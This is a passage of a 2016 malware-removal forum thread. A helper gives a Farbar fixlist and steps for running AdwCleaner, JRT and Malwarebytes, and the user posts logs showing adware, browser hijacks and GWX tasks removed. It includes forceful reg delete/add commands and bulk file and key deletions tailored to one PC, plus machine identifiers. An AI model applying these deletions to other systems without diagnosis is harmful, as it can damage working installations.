C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
EmptyTemp:
End
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~~~~~~~~
http://i.imgur.com/BY4dvz9.png AdwCleaner
Please download AdwCleaner (http://www.bleepingcomputer.com/download/adwcleaner/) and save the file to your Desktop.
Right-Click AdwCleaner.exe and select http://i.imgur.com/AVOiBNU.jpg Run as administrator to run the programme.
Follow the prompts.
Click Scan.
Upon completion, click Report. A log (AdwCleaner[SX].txt) will open. Briefly check the log for anything you know to be legitimate.
Ensure anything you know to be legitimate does not have a checkmark, and click Clean.
Follow the prompts and allow your computer to reboot.
After rebooting, a log (AdwCleaner[SX].txt) will open. Copy the contents of the log and paste in your next reply.
-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://imageshack.us/a/img841/7292/thisisujrt.gif
Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/)
or from here http://downloads.malwarebytes.org/file/jrt
to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
~~~~~~~~~~
Download CKScanner by askey127 from HERE (http://downloads.malwareremoval.com/CKScanner.exe)
Important - Save it to your desktop.
Doubleclick CKScanner.exe and click Search For Files.
After a very short time, when the cursor hourglass disappears, click Save List To File.
A message box will verify the file saved.
Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~``
Download Malwarebytes' Anti-Malware (http://www.malwarebytes.org/mbam-download.php) TO YOUR DESKTOP
Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
http://i24.photobucket.com/albums/c30/ken545/0841859c-1a35-4dbd-b41a-e720629e3e22_zpst0yckuua.png
On the Dashboard click on Update Now
Go to the Setting Tab
Under Setting go to Detection and Protection
Under PUP and PUM make sure both are set to show Treat Detections as Malware
Go to Advanced setting and make sure Automatically Quarantine Detected Items is checked
Then on the Dashboard click on Scan
Make sure to select THREAT SCAN
Then click on Scan
After the restart once you are back at your desktop, open MBAM once more.
Click on the History tab > Application Logs.
Double click on the scan log which shows the Date and time of the scan just performed.
Click 'Copy to Clipboard'
Paste the contents of the clipboard into your reply
~~~~~~~~~~~~~~~~~~~``
please post
Fixlog.txt
AdwCleaner[CX].txt
JRT.txt
CKFiles.txt
Malwarebytes' Anti-Malware log
kym.preston
2016-03-01, 04:28
Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-01 12:19:19) Run:1
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
EmptyTemp:
End
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
*****************
Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
"HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
"HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
"HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
"HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
"HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
"HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
"HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
"HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
"HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
"HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c4e7ab80-82fd-49d4-801d-669cc0a2392a}" => key removed successfully
HKCR\Wow6432Node\CLSID\{c4e7ab80-82fd-49d4-801d-669cc0a2392a} => key not found.
"HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
C:\Users\Kym\IP_Log_Data.js => moved successfully
C:\Users\Kym\Network_Meter_Data.js => moved successfully
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll => moved successfully
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe => moved successfully
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe => moved successfully
"HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
C:\WINDOWS\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Shortcut argument removed successfully.
C:\Users\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
C:\Users\Kym\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
The operation completed successfully.
========= End of Reg: =========
========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
The operation completed successfully.
========= End of Reg: =========
========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
The operation completed successfully.
========= End of Reg: =========
========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
The operation completed successfully.
========= End of Reg: =========
EmptyTemp: => 4 GB temporary data Removed.
The system needed a reboot.
==== End of Fixlog 12:20:13 ====
# AdwCleaner v5.037 - Logfile created 01/03/2016 at 12:31:36
# Updated 28/02/2016 by Xplode
# Database : 2016-02-28.2 [Server]
# Operating system : Windows 10 Home (x64)
# Username : Kym - KYM-PC
# Running from : C:\Users\Kym\Desktop\AdwCleaner.exe
# Option : Clean
# Support : http://toolslib.net/forum
***** [ Services ] *****
***** [ Folders ] *****
[-] Folder Deleted : C:\ProgramData\AppVerifier
[-] Folder Deleted : C:\ProgramData\0342bcb1-0de3-0
[-] Folder Deleted : C:\ProgramData\0342bcb1-60e1-0
[-] Folder Deleted : C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
[-] Folder Deleted : C:\ProgramData\3af26a8e-3475-0
[-] Folder Deleted : C:\ProgramData\3af26a8e-45f1-1
[-] Folder Deleted : C:\ProgramData\3c355888
[-] Folder Deleted : C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[-] Folder Deleted : C:\ProgramData\{0b5d3910-112c-1}
[-] Folder Deleted : C:\ProgramData\{21b5474a-312c-0}
[-] Folder Deleted : C:\Users\Kym\AppData\Roaming\EasyFileOpener
***** [ Files ] *****
[-] File Deleted : C:\appverifier.txt
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage-journal
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage
[-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage-journal
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb
***** [ DLLs ] *****
***** [ Shortcuts ] *****
***** [ Scheduled tasks ] *****
[-] Task Deleted : {9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}
***** [ Registry ] *****
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c355888}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
[-] Key Deleted : HKCU\Software\ICSW1.17
[-] Key Deleted : HKCU\Software\powerpack
[-] Key Deleted : HKCU\Software\PRODUCTSETUP
[-] Key Deleted : HKCU\Software\TornTv Downloader
[-] Key Deleted : HKLM\SOFTWARE\mystartsearchSoftware
[-] Key Deleted : HKLM\SOFTWARE\SPPDCOM
[-] Key Deleted : [x64] HKLM\SOFTWARE\AppVerifierService
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\chrome-64-bit.en.softonic.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com
[-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\chrome-64-bit.en.softonic.com
